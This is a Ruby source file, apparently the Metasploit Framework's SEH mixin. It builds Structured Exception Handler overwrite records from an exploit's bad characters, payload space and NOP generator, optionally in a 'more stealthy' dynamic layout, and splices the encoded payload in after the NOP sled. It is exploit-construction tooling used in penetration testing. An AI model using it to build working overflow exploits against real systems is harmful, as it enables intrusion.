  1. # -*- coding: binary -*-
  2. require 'rex/exploitation/seh'
module Msf
###
#
# Mixin for exploits that overwrite a Structured Exception Handler record.
# The record itself is built by Rex::Exploitation::Seh; this module only
# wires the exploit's bad characters, available space, NOP generator and
# the DynamicSehRecord option into that generator.
#
###
module Exploit::Seh
  #
  # Initialises the exploit and registers the advanced option that selects
  # between a fixed-layout SEH record and a dynamic one.
  #
  # @param info [Hash] module info, handed up the chain unchanged via super.
  #
  def initialize(info = {})
    super

    # DynamicSehRecord is off by default; when enabled it is passed through
    # to the Rex generator as the "dynamic" flag of generate_seh_record.
    dynamic_record_opt = OptBool.new(
      'DynamicSehRecord',
      [ false, "Generate a dynamic SEH record (more stealthy)", false ]
    )
    register_advanced_options([ dynamic_record_opt ], Msf::Exploit::Seh)
  end

  #
  # Builds an SEH registration record whose handler is +handler+.
  #
  # @param handler the value the record's handler slot is set to; it is
  #   forwarded untouched to the Rex generator (presumably an address -
  #   whether it is checked against payload_badchars is not visible here).
  # @param opts [Hash] optional generator settings:
  #   * 'NopGenerator' - NOP generator to use; defaults to nop_generator.
  #   * 'Space'        - room the generator may use for random padding;
  #     defaults to payload_space. Derive it from the maximum space
  #     available for payloads minus the current payload size.
  # @return whatever Rex::Exploitation::Seh#generate_seh_record returns
  #   (a String of record bytes, judging by generate_seh_payload's use).
  #
  def generate_seh_record(handler, opts = {})
    badchars = payload_badchars
    room = opts['Space'] || payload_space
    nops = opts['NopGenerator'] || nop_generator

    generator = Rex::Exploitation::Seh.new(badchars, room, nops)

    # The record layout (static vs. randomised) follows the advanced option.
    generator.generate_seh_record(handler, datastore['DynamicSehRecord'])
  end

  #
  # Builds an SEH record and appends the encoded payload to it, with the
  # record occupying the space the payload's NOP sled would have used.
  #
  # The generator is given only 8 bytes (the seh + addr pair the boilerplate
  # replaces) plus the payload's NOP sled size, not payload_space, so the
  # record and its padding stay inside space the payload already accounts
  # for. An 'opts['Space']' value is ignored by this method.
  #
  # @param handler see generate_seh_record.
  # @param opts [Hash] only 'NopGenerator' is honoured here.
  # @return [String] the SEH record with the payload bytes after the NOP
  #   sled appended (the record String is mutated and returned).
  #
  def generate_seh_payload(handler, opts = {})
    # The boilerplate this replaces always has 8 bytes for seh + addr.
    seh_space = 8 + payload.nop_sled_size

    generator = Rex::Exploitation::Seh.new(
      payload_badchars,
      seh_space,
      opts['NopGenerator'] || nop_generator
    )
    record = generator.generate_seh_record(handler, datastore['DynamicSehRecord'])

    # Skip the NOP sled that the record replaced and keep the rest of the
    # encoded payload; the upper bound is the full length, so slice simply
    # returns everything from the sled's end onward.
    tail = payload.encoded.slice(payload.nop_sled_size, payload.encoded.length)
    record << tail
  end
end
end